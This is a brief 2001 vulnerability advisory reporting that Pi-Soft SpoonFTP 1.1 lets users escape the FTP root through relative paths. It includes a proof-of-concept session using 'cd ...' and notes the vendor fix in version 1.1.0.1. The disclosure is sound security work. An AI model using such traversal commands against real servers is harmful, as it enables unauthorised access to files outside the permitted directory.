Reported September 20, 2001, by Joe Testa.

VERSION AFFECTED

·         Pi-Soft SpoonFTP 1.1 for Windows 2000, Windows NT, Windows Me, and Windows 9x

 

DESCRIPTION
A vulnerability exists in Pi-Soft SpoonFTP 1.1 that lets an attacker use relative paths to break out of an FTP root.

 

DEMONSTRATION

 

Joe Testa provided the following scenario as proof-of-concept:

 

>ftp localhost

Connected to xxxxxxxx.rh.rit.edu.

220 SpoonFTP V1.1

User (xxxxxxxx.rh.rit.edu:(none)): jdog

331 Password required.

Password:

230 User logged in, proceed.

ftp> pwd

257 "/" is current directory.

ftp> cd ...

250 CWD command successful.

ftp> pwd

257 "/..." is current directory.

ftp>

 

VENDOR RESPONSE

The vendor, Pi-Soft Consulting, has released version 1.1.0.1 to fix this vulnerability.

 

CREDIT
Discovered by Joe Testa.